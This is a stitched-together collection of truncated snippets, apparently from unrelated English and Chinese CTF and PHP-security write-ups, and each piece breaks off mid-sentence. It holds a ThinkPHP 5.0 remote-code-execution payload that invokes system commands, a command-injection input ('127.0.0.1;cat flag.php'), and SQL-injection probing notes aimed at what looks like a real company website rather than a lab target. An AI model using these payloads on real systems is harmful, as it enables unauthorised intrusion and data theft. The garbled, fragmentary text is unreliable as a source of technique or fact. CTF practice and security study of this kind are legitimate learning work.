This was a fun one that taught me about PHP assert(). Assertion101 Walkthrough OSCP Bootcamp March 10th 2023 Topics: Earlier this week was the first day of the OSCP bootcamp I started at Evolve Security. So far, so good. Our lead instructor has a ton of real world experience and I ...
public function __construct($file='index.php'){ $this->source = $file; echo 'Welcome to '.$this->source.""; } public function __toString(){ return $this->str->source; } public function __wakeup(){ if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)...
Run a binary as a different architecture 64 bit: linux64 ./<binary> 32 bit: linux32 ./<binary> Extract MS Macros: https://www.onlinehashcrack.com/tools-online-extract-vba-from-office-word-excel.php View CNC GCode https://ncviewer.com/ About...
BUGKUCTFWEB基础$_POST 同上个题进行比较 。 PHP中post和get传值的区别。 根据题目,我们需要用POST方式传参数what=flag即可。 利用火狐浏览器安装Hackbar插件 即可得到flag。 CTF学习(入门):Bugku--web篇--web2 CTF学习(入门):Bugku--web篇--web2题目链接:http://123.206.87.240:8002/web2涉及操作:查看网页源...
with an opportune accidental discovery of a PHPzero-day vulnerabilitythat the CTF designer or anybody in the community knew nothing about. PHP powers many modern websites, including popular web platforms like WordPress and Drupal. While the team that maintains PHP is diligent, quickly patching newly...
首先是sql注入。这是一道简单的整数型注入题目。首先,进入网址:http://www.kabelindo.co.id/index.php 刚开始我以为是搜索框注入,然后我发现我错了。。。但是,我看到了news: 这就非常的舒服,进入后果然有一个注入点加一个单引号,会报错。加 and1=1,不会报错。说明是一个 智能...
打开容器就知道是5.0版本的thinkphp了,网上搜rce一把梭 poc ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 修改poc,直接看到flag payload ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=env 随便注 ...
<?php $row; $pass=$_POST['pw']; if($row['username']=='admin'){ if($row['password']==md5($pass)){ echo $flag; }else{ echo "wrong pass!"; } }else{ echo "wrong user!"; } 1. 2. 3. 4. 5. 6. 7. 8. 9.
The Zerion challenge was an encoded PHP file, the script provided the steps to decode the string via the following function:base64_decode(strrev(str_rot13($L66Rgr[1]))) To get the flag you needed to: ROT 13 “decrypt” the encoded string, ...
然后,既然flag.php在同级目录下,直接 cat 拿到就好了如果它没有过滤的话我们应该这样填入127.0.0.1;cat flag.php 但经过我们的输入发现,这题它把 空格和 'flag' 给过滤了,所以,我们得想办法把 空格和 'flag' 给绕过 我们先来 绕过下空格,在这之前我们来了解下 0x03...